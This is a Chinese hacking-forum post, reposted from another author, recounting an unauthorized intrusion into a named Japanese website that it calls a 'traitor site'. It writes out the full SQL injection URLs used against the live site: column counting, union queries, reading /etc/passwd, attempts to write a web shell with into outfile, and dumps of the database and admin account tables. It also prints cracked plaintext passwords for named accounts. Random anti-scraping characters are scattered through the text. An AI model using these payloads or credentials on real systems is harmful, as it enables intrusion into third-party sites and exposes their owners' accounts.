中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

( }7 ^, m' O, G, j$ Y" X& e% P$ I" W# m0 u  N
0x01. 检测 www.zuaa.jp 收集数据  M: _6 I4 B8 E7 \4 k
[attach]73[/attach]
% L/ Y( Z+ `" r5 H
  M2 i+ P- F2 B$ P) zwhatweb+ }) C( w' {2 Q" \8 d
[attach]74[/attach]7 U  K) I  `" M. i
* ^; @0 m, e  H5 h1 j- X. I+ G
利用NMAP扫描
$ S9 ]; X( T) \9 t/ Q7 v3 Q- ?[attach]75[/attach]% O0 q9 w- N! x" `4 E1 ]
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* f' w' d7 I8 N. ?) \
0x02.找注入点
2 D" O8 e& N; ]' h. K找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
+ \7 v( b1 D! r[attach]76[/attach]
) M2 ]; n' b4 h9 q- o0 P
/ R1 v$ f: S! ]: Q; x0x03.order by
2 b7 Z& W8 K5 D             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
3 y$ D1 Z$ n9 v; _5 [8 t( r. A+ J[attach]77[/attach]4 b, G/ u. ~2 q
order by 28报错,order by 27正常
* U  T; K% r: a
8 l/ u8 ~; e4 R8 n& V* g! w0x04.   union手动查询8 j# ~8 R9 Z4 A- l: r6 G
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 * R# A  w- l* ^
添加到 27 时正常显示
2 p% w1 }$ T$ P5 f# R# F[attach]78[/attach]" a& W) R" f# S6 t, O
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" w( e0 h( y. d$ L$ m. M- @
6 c- }; W0 O0 ~" v0x05. info:/ w* ]& X5 V. B
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 , P6 o7 s4 q2 p
[attach]79[/attach]
* H) D0 t. w) A" h9 k9 \: zuser:            root@localhost
, I3 D  Z1 [& `$ adatabase:    openpne# ?+ N2 d5 L' G# q& t' j
version:      4.1.22
9 [4 n0 C. G4 e8 \) p5 S' H" U7 Pos:             portbld-freebsd5.4
' Z+ A! ]! p& _: T" q% X# T) J
% Z. h2 o* F, z4 s3 h0x06. root用户
" e  f* M# k: }$ T利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)7 I) e2 Q! T/ g
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : W4 l2 ~/ f: W5 h
[attach]80[/attach]( L8 P" f2 B, o& H6 y1 }# n' Q9 l
通过工具转换1 o" m- U. Q5 E2 ^0 x
[attach]81[/attach]
8 f: ~* r" v4 e( v2 m中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' B% w8 l, D3 Q; Y5 Z
3 S$ v$ {" Y: c
0x07. 利用 into outfile9 N- s# S4 {/ q+ O& C; B- I# `- O
全部都失败+ o; u. C5 b. U
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
6 _' w0 o4 P2 s$ h! |( b! m( W" j0 W: v. b# w
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
5 j2 r- ^" T$ f2 @: n
' J, S2 G9 r+ {页面显示“MDB2 Error:syntax error”# J- _0 T/ v* J& A8 o

/ Y0 r/ w: h- I" t) D" N5 C0x08. 利用 mysql 4.1
6 r( k2 |6 n3 N" z9 Q0 o1 a# T猜常规表名,字段未果 工具 sqlmap
+ R9 [& Q5 H/ W( n2 a3 ?$ F中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
6 U0 u1 h3 t$ c: Q5 D+ Y9 H- _7 o; l' K0 M. q' {# s+ S
[attach]82[/attach]
) M* @- p* {( @- L2 h3 w+ K/ v, @6 j! V
0x09. 查找后台  p2 }, l: t2 [$ |  [5 Z  U* G( k
利用 现有的各种 后台工具尝试都不行
: F- h8 v( b: N, s7 N5 b$ C" n# A; x' M% n* z- Y- A( d
0x10.  MySL外联方法
& V8 E* N& N  H( ]从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
  M. i0 O: ]- m  h6 H可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
% v+ ~, _. A* {$ J/ khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user* z, N& ^" ~4 m
[attach]83[/attach]
% [" r& B4 I" X6 B$ M8 z  S这个可以在 www.cmd5.com 解密
& ^  p- g4 U) g& f/ U6 Hroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009/ r  C0 `- o6 Y$ v  M) l) s2 {
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97% R& t( M9 h) d- N+ B
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 H2 g6 R- E( l/ ]2 }5 Q3 Hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
) C8 a) m# d, C: T工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
4 o" |: M, @( ]3 [4 }- y* P4 o[attach]84[/attach]
& b7 E0 _/ C0 G" L8 [$ s5 ^5 @" y: a- s
0x11. 网站突破6 l! W4 z" F) z+ ^& p
发现网站的源程序 openpne, google 下载 openpne 源码: ~# j( L- c4 A* s6 s
[attach]85[/attach]3 H9 P0 V3 f4 L0 g" C& z- w
* f+ F' X3 D; J0 N+ ]1 k1 x$ ~
0x12. 默认信息利用
/ L. \9 G+ p) r3 H! f6 _http://sns.zuaa.jp/?m=admin&a=page_login
3 l) H, n; M6 y) |8 [+ b- i  ^1 q- [[attach]86[/attach]! R- c- O9 ~! A8 h9 L, i
表名 (c_admin_user) ,字段名(username,password). b3 k) s; J" ~- _' P8 _! F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
; M, f4 x' J* w$ B+ b% c[attach]87[/attach]0 @! q5 d5 P- F+ t) Q; U, t
解密* [9 s# n  e- Y9 C8 U- X# N
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20096 n2 B: W! I. D8 Y; A6 w! E
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
# v+ r* X' j- g0 t% d5 g5 f. P' K) p8 x1 V( f6 Q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 ?- r6 p* D) R9 _; o, w# Q* E4 @
0x13. 登录后台- [. `: ]) _8 }/ a+ H" u
[attach]88[/attach]
7 k3 o" p* R& t( W6 a/ e& i0 l# v1 u) ]; w  A1 x* V. `7 D
; L4 R  R2 E+ b, v, Q) a; w
0x14. 小结
- C2 G9 m! |; O6 n利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
! k7 z0 w" Y/ A7 d$ ^& B% c& q1 j感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
6 t" b) a# y* i* N: ?0 L: O2 \------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
" S% D; j/ N# _1 |" b. h( Z3 B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持) m* A7 L/ l/ ]  r+ ]% H* M2 L

" u" o' \* C& B) T最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
' u9 Y, P+ b$ J; Q
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2